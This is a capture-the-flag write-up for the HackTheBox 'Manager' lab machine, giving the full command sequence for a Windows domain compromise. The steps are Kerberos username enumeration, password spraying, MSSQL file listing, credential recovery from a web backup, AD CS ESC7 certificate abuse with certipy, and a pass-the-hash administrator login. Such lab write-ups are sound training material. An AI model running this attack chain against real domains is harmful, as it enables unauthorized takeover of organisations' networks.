Manager – HackTheBox Writeup
Machine Name: Manager
IP: 10.10.11.236
Difficulty: Medium
Summary
Manager is a medium difficulty machine that starts with enumerating usernames and password spraying them to login to MSSQL shell. The MSSQL shell was used to fetch a configuration file containing user credentials that were used to obtain the user shell. Privilege Escalation consisted of abusing the Active Directory Certificate Services (AD CS) misconfiguration to issue an administrator certificate that was used to obtain the TGT hash and authenticate as administrator.
Information Gathering
Nmap scan shows that port 53 (DNS), 80 (HTTP), Kerberos (88, 464), MSRPC (135, 593), SMB (139, 445), LDAP (389, 636, 3268, 3269), and MsSQL (1433) and port 8080 (HTTP) are open.
Evidently, this seems to be a a Windows machine as it is running Kerberos, SMB, and LDAP. Since the domain revealed is “manager.htb”, I’ll add it to my hosts file.
I checked the webserver on port 80 and didn’t find anything interesting. In Windows machines, I usually check for contact pages for usernames but didn’t find anything there either.
I’ll run directory enumeration in the background while I enumerate the other ports.
ffuf -u http://manager.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -mc all -ac -o dir_ffuf.txt
I tried to enumerate users using RPCclient and impacket’s lookupsid, but they didn’t fetch me any information.
rpcclient -U "" -N 10.10.11.236 >enumdomusers impacket-lookupsid -no-pass manager.htb
Enumerating for Users
Next, I tried running Kerbrute and found the usernames!
kerbrute -d manager.htb --dc manager.htb userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
One could do the same with crackmapexec by bruteforcing the RID values.
crackmapexec smb manager.htb -u anonymous -p "" --rid-brute
I saved the usernames in a file.
ryan guest cheng raven administrator operator
Password Spraying
We can now try to perform the password spray attack with crackmapexec using the list of users we’ve just gathered.
crackmapexec smb manager.htb -u users.txt -p users.txt
The password for user “operator” is the same as the username.
Gaining a User Shell
The next logical step would be to check if these credentials work in the MySQL login.
impacket-mssqlclient manager.htb/operator:operator@manager.htb -dc-ip dc01.manager.htb -windows-auth
Whenever an access to a database shell is obtained, I either look for credentials or check if the database shell can run commands. Since I couldn’t find anything interesting in the database, I tried to check if I can run system commands by checking if “xp_cmdshell” is enabled.
USE master; # Check the users who can run xp_cmdshell EXEC sp_helprotect 'xp_cmdshell' # Check if it is enabled SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
Unfortunately, “xp_cmdshell” wasn’t enabled. I also checked if we have access to the files by checking if “xp_dirtree” is enabled and found it to be enabled.
I found a backup file called “website-backup-27-07-23-old.zip” in the “C:\inetpub\wwwroot” directory.
EXEC xp_dirtree 'C:\inetpub\wwwroot'
Files within the “/wwwroot” directory are considered to be a part of the webserver’s root directory. Therefore, I checked if this file can be downloaded publicly, and indeed it was.
wget http://10.10.11.236/website-backup-27-07-23-old.zip
I proceeded to unzip the file and found a configuration file called “.old-conf.xml” has the credentials for the user raven.
unzip website-backup-27-07-23-old.zip cat .old-conf.xml
I was able to login as raven using EvilRM and fetch the user flag!
evil-winrm -i manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
Privilege Escalation
Windows machines are all about exploiting misconfiguration of privileges. The first command I ran was “whoami” and I found that the user raven belongs to the “Certificate Service DCOM Access” group.
whoami /all
Exploiting Active Directory Certificate Services (AD CS)
AD CS is responsible for issuing certificates which are digitally signed documents that can be used for encryption, message signing, and authentication. An application can use a key pair to verify the identity of the user. Certificate Authorities (CA) are responsible for issuing the certificates.
A client generates a key pair and sends a certificate signing request (CSR) to a CA server. The CA server checks if the certificate template exists, and if the user is allowed to enroll for a certificate. If the CSR matches the requirements by the CA server, it generates a certificate and signs it using the CA private key. Finally, the client stores the certificate in Windows Certificate store and uses it to perform encryption, or message signing, or authentication (our goal).
AD CS misconfigurations can be used in various ways. The potential attack vectors could be abusing certificates to gain unauthorized privileges, even gain domain escalation.
A tool called “certipy” allows us to find vulnerable certificate templates.
pip install certipy-ad certipy certipy find -vulnerable -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236
cat 20231102023419_Certipy.txt
The output reveals that user raven has access rights to Enroll, ManageCertificates, and ManageCA. These are exactly the prerequisites for the attack described in the HackTricks page for ESC7 vulnerability.
ESC7 Vulnerability
Since user raven has ManageCA and Enroll rights, the user can grant themselves Manage Certificate permission and issue failed certificate requests. The intention here is to enroll in the template as raven in SubCA and be denied by the CA as only administrators can enroll in the template, but finally the manager issues the certificate for administrator which can be used to fetch the TGT hash for administrator.
As per the attack flow, I followed the instructions and ran the commands.
First, I grant raven the ManageCertificate access right by adding raven as a new officer.
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Then, I enabled the SubCA template on the CA.
certipy ca -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -enable-template 'SubCA'
Now that the prerequisites for the attack have been fulfilled, raven can request a certificate based on the SubCA template.
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn administrator@manager.htb
As expected, the request is denied and the private key is saved and the request ID is obtained.
certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
With the ManageCA and Manage Certificates, the failed certificate request is issued.
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 13
With the “administrator.pfx” certificate, we can authenticate ourselves and fetch the TGT.
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236
Initially I received this error regarding the time on the machine being different from the time on my machine.
I resolved it by setting my machine’s time same as that of Raven’s.
sudo apt-get install rdate sudo rdate -n manager.htb
Finally, I got the hash for administrator!
I used this hash to login as Administrator using EvilRM and obtained the root flag.
evil-winrm -i manager.htb -u administrator -H 'ae5064c2f62317332c88629e025924ef'
I highly recommend reading the Github page of Certipy to understand all the attacks related to AD CS.
Pwned!
